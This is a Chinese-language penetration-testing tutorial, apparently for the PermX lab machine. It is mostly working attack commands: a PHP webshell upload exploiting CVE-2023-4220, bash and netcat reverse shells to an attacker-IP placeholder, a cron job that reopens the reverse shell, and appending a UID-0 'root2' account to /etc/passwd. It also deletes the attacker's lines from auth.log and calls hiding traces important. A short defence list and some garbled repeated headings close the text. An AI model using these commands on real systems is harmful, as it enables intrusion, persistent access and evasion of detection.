PermX渗透实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用nmap进行初步端口探测：<\/p>

nmap -sS -T4 <目标IP>
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22端口(SSH)<\/li>
80端口(HTTP)<\/li>
<\/ul>
详细扫描：<\/p>
nmap -sV -sC -p22,80 <目标IP>
<\/span><\/span><\/code><\/pre>1.2 子域名爆破<\/h3>
使用工具如subfinder、assetfinder或amass进行子域名枚举：<\/p>
subfinder -d <目标域名> -o subdomains.txt
<\/span><\/span><\/code><\/pre>将发现的子域名添加到hosts文件：<\/p>
echo "<IP> <子域名>"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. Web应用渗透<\/h2>
2.1 目录爆破<\/h3>
使用dirsearch或gobuster进行目录枚举：<\/p>
gobuster dir -u http:\/\/<目标> -w \/path\/to\/wordlist.txt
<\/span><\/span><\/code><\/pre>2.2 漏洞发现<\/h3>
发现关键文件：<\/p>

README.md文件（可能包含版本信息）<\/li>
存在登录页面（潜在认证绕过或注入点）<\/li>
<\/ul>
2.3 CVE-2023-4220漏洞利用<\/h3>
漏洞详情：<\/p>

允许存储型XSS通过webshell导致RCE<\/li>
攻击者可上传.php后缀文件<\/li>
需要存在特定目录：\/main\/inc\/lib\/javascript\/bigupload\/files<\/code><\/li>
<\/ul>
利用步骤：<\/p>

确认漏洞目录存在<\/li>
使用curl上传PHP webshell：<\/li>
<\/ol>
curl -X POST -F "file=@shell.php"<\/span> http:\/\/<目标>\/upload_path\/
<\/span><\/span><\/code><\/pre>PHP webshell示例：<\/p>
<?<\/span>php<\/span> system<\/span>($_GET['cmd'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>3. 获取初始访问<\/h2>
3.1 命令执行验证<\/h3>
访问上传的webshell：<\/p>
http:\/\/<目标>\/upload_path\/shell.php?cmd=id
<\/code><\/pre>
3.2 反弹shell<\/h3>
使用bash反弹shell：<\/p>
bash -c 'bash -i >& \/dev\/tcp\/<攻击者IP>\/<端口> 0>&1'<\/span>
<\/span><\/span><\/code><\/pre>或使用nc：<\/p>
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc <攻击者IP> <端口> >\/tmp\/f
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 内网信息收集<\/h3>
关键命令：<\/p>
# 系统信息<\/span>
<\/span><\/span>uname -a
<\/span><\/span>cat \/etc\/*-release
<\/span><\/span>
<\/span><\/span># 用户信息<\/span>
<\/span><\/span>id
<\/span><\/span>whoami
<\/span><\/span>cat \/etc\/passwd
<\/span><\/span>
<\/span><\/span># 网络信息<\/span>
<\/span><\/span>ifconfig
<\/span><\/span>netstat -tulnp
<\/span><\/span>
<\/span><\/span># 查找配置文件<\/span>
<\/span><\/span>find \/var\/www\/html -name "*.conf"<\/span> -o -name "*.config"<\/span>
<\/span><\/span><\/code><\/pre>4.2 发现配置文件泄露<\/h3>
常见敏感文件位置：<\/p>

\/var\/www\/html\/config.php<\/li>
\/var\/www\/html\/.env<\/li>
\/var\/www\/html\/configuration.ini<\/li>
<\/ul>
4.3 Linux ACL权限利用<\/h3>
检查特殊权限：<\/p>
getfacl \/path\/to\/file
<\/span><\/span><\/code><\/pre>发现以root权限运行的脚本：<\/p>
find \/ -perm -4000 -type f 2>\/dev\/null
<\/span><\/span>find \/ -user root -perm -4000 -exec ls -ldb {}<\/span> \;<\/span> 2>\/dev\/null
<\/span><\/span><\/code><\/pre>4.4 利用ACL漏洞提权<\/h3>

分析可疑脚本：<\/li>
<\/ol>
cat \/path\/to\/suspicious_script.sh
<\/span><\/span><\/code><\/pre>

检查脚本中的权限检查逻辑缺陷<\/p>
<\/li>

如果脚本使用test<\/code>或[<\/code>命令进行权限验证，可能通过符号链接绕过：<\/p>
<\/li>
<\/ol>
ln -s \/root\/.ssh\/authorized_keys \/tmp\/fakefile
<\/span><\/span><\/code><\/pre>
修改脚本或利用其逻辑缺陷读取敏感文件<\/li>
<\/ol>
4.5 生成密码哈希<\/h3>
使用openssl生成密码哈希：<\/p>
openssl passwd -1 -salt xyz yourpassword
<\/span><\/span><\/code><\/pre>或使用mkpasswd：<\/p>
mkpasswd -m sha-512 yourpassword
<\/span><\/span><\/code><\/pre>4.6 添加root用户<\/h3>
编辑\/etc\/passwd或\/etc\/shadow：<\/p>
echo 'root2:$1$xyz$qX78Q9SXz5fPyo90xU.TX.:0:0::\/root:\/bin\/bash'<\/span> >> \/etc\/passwd
<\/span><\/span><\/code><\/pre>然后切换用户：<\/p>
su root2
<\/span><\/span><\/code><\/pre>5. 后渗透操作<\/h2>
5.1 建立持久化访问<\/h3>

添加SSH公钥：<\/li>
<\/ol>
echo "<公钥>"<\/span> >> \/root\/.ssh\/authorized_keys
<\/span><\/span><\/code><\/pre>
创建cron job：<\/li>
<\/ol>
(<\/span>crontab -l 2>\/dev\/null; echo "* * * * * \/bin\/bash -c 'bash -i >& \/dev\/tcp\/<IP>\/<PORT> 0>&1'"<\/span>)<\/span> | crontab -
<\/span><\/span><\/code><\/pre>5.2 清理痕迹<\/h3>
删除日志：<\/p>
# 清除当前用户相关日志<\/span>
<\/span><\/span>sed -i '\/<你的IP>\/d'<\/span> \/var\/log\/auth.log
<\/span><\/span>sed -i '\/<你的用户名>\/d'<\/span> \/var\/log\/auth.log
<\/span><\/span><\/code><\/pre>关键要点总结<\/h2>

信息收集要全面<\/strong>：端口扫描和子域名枚举是发现攻击面的基础<\/li>
Web应用是常见入口<\/strong>：目录爆破和文件发现往往能揭示关键漏洞<\/li>
CVE利用要精准<\/strong>：了解漏洞条件和利用方式，如CVE-2023-4220需要特定目录存在<\/li>
权限提升多路径<\/strong>：从ACL权限、SUID程序到密码哈希破解，多种方式尝试<\/li>
痕迹管理很重要<\/strong>：渗透后要清理日志，避免被发现<\/li>
<\/ol>
防御建议<\/h2>

限制上传文件类型和目录权限<\/li>
定期更新和修补已知漏洞<\/li>
最小化系统权限，避免不必要的SUID程序<\/li>
监控系统日志和异常行为<\/li>
使用ACL时要谨慎设置，避免权限逃逸<\/li>
<\/ol>

PermX渗透实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. Web应用渗透<\/h2>

3. 获取初始访问<\/h2>

4. 权限提升<\/h2>

5. 后渗透操作<\/h2>

防御建议<\/h2> 限制上传文件类型和目录权限<\/li> 定期更新和修补已知漏洞<\/li> 最小化系统权限，避免不必要的SUID程序<\/li> 监控系统日志和异常行为<\/li> 使用ACL时要谨慎设置，避免权限逃逸<\/li> <\/ol>

防御建议<\/h2>

限制上传文件类型和目录权限<\/li>
定期更新和修补已知漏洞<\/li>
最小化系统权限，避免不必要的SUID程序<\/li>
监控系统日志和异常行为<\/li>
使用ACL时要谨慎设置，避免权限逃逸<\/li> <\/ol>